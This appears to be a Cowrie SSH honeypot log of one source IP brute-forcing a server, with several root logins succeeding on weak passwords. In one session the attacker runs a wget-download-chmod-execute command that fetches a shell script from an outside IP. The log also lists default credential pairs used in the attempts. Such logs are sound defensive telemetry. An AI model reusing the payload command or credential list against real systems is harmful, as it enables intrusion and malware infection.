{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:35.037956Z","src_ip":"212.227.125.160","session":"3fd51aaf7918"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:35.069276Z","src_ip":"212.227.125.160","session":"3fd51aaf7918"}
{"eventid":"cowrie.login.failed","username":"user4","password":"user4","message":"login attempt [user4/user4] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:35.261345Z","src_ip":"212.227.125.160","session":"3fd51aaf7918"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:36.307006Z","src_ip":"212.227.125.160","session":"3fd51aaf7918"}
{"eventid":"cowrie.session.closed","duration":35.310628175735474,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:39.766310Z","src_ip":"212.227.125.160","session":"a0be016475de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44202,"dst_ip":"1.2.3.4","dst_port":22,"session":"86872bc949c7","protocol":"ssh","message":"New connection: 212.227.125.160:44202 (1.2.3.4:22) [session: 86872bc949c7]","sensor":"my-vps","timestamp":"2025-08-26T22:10:40.777563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:40.897430Z","src_ip":"212.227.125.160","session":"86872bc949c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:40.898772Z","src_ip":"212.227.125.160","session":"86872bc949c7"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:41.552303Z","src_ip":"212.227.125.160","session":"86872bc949c7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:42.603661Z","src_ip":"212.227.125.160","session":"86872bc949c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39590,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd192f6c21c4","protocol":"ssh","message":"New connection: 212.227.125.160:39590 (1.2.3.4:22) [session: fd192f6c21c4]","sensor":"my-vps","timestamp":"2025-08-26T22:10:47.341367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:47.342149Z","src_ip":"212.227.125.160","session":"fd192f6c21c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:47.397936Z","src_ip":"212.227.125.160","session":"fd192f6c21c4"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:48.551271Z","src_ip":"212.227.125.160","session":"fd192f6c21c4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:49.640814Z","src_ip":"212.227.125.160","session":"fd192f6c21c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34978,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc1dbb905ad6","protocol":"ssh","message":"New connection: 212.227.125.160:34978 (1.2.3.4:22) [session: bc1dbb905ad6]","sensor":"my-vps","timestamp":"2025-08-26T22:10:52.956862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:52.957796Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:53.016213Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:10:53.178608Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:10:53.368277Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:10:53.369051Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:53.423721Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:53.424789Z","src_ip":"212.227.125.160","session":"bc1dbb905ad6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58596,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c2e1dba930","protocol":"ssh","message":"New connection: 212.227.125.160:58596 (1.2.3.4:22) [session: 59c2e1dba930]","sensor":"my-vps","timestamp":"2025-08-26T22:10:58.785293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:58.786616Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:58.848623Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48228,"dst_ip":"1.2.3.4","dst_port":22,"session":"392a131cf910","protocol":"ssh","message":"New connection: 212.227.125.160:48228 (1.2.3.4:22) [session: 392a131cf910]","sensor":"my-vps","timestamp":"2025-08-26T22:10:58.936722Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.038306Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.062615Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.065762Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:10:59.166107Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.167062Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.220165Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.221423Z","src_ip":"212.227.125.160","session":"59c2e1dba930"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.377810Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:10:59.578027Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.578958Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.session.file_download","url":"http://23.146.184.21/adb.sh","outfile":"var/lib/cowrie/downloads/5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","shasum":"5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.810105Z","message":"Downloaded URL (http://23.146.184.21/adb.sh) with SHA-256 5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869 to var/lib/cowrie/downloads/5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":455,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:59.910043Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:00.212948Z","src_ip":"212.227.125.160","session":"392a131cf910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37783,"dst_ip":"1.2.3.4","dst_port":22,"session":"a69ca445991c","protocol":"ssh","message":"New connection: 212.227.125.160:37783 (1.2.3.4:22) [session: a69ca445991c]","sensor":"my-vps","timestamp":"2025-08-26T22:11:01.009879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:01.010645Z","src_ip":"212.227.125.160","session":"a69ca445991c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:01.229208Z","src_ip":"212.227.125.160","session":"a69ca445991c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53984,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e9bf41847ab","protocol":"ssh","message":"New connection: 212.227.125.160:53984 (1.2.3.4:22) [session: 2e9bf41847ab]","sensor":"my-vps","timestamp":"2025-08-26T22:11:03.886228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:03.887215Z","src_ip":"212.227.125.160","session":"2e9bf41847ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:03.932354Z","src_ip":"212.227.125.160","session":"2e9bf41847ab"}
{"eventid":"cowrie.login.failed","username":"systemd","password":"systemd","message":"login attempt [systemd/systemd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:04.168656Z","src_ip":"212.227.125.160","session":"2e9bf41847ab"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:05.214033Z","src_ip":"212.227.125.160","session":"2e9bf41847ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49372,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d0da38696bc","protocol":"ssh","message":"New connection: 212.227.125.160:49372 (1.2.3.4:22) [session: 8d0da38696bc]","sensor":"my-vps","timestamp":"2025-08-26T22:11:09.510994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:09.512038Z","src_ip":"212.227.125.160","session":"8d0da38696bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:09.577054Z","src_ip":"212.227.125.160","session":"8d0da38696bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47356,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad79d3350f70","protocol":"ssh","message":"New connection: 212.227.235.229:47356 (1.2.3.4:22) [session: ad79d3350f70]","sensor":"my-vps","timestamp":"2025-08-26T22:11:09.925853Z"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:10.092361Z","src_ip":"212.227.125.160","session":"8d0da38696bc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:11.213111Z","src_ip":"212.227.125.160","session":"8d0da38696bc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:11.828376Z","src_ip":"212.227.235.229","session":"ad79d3350f70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-s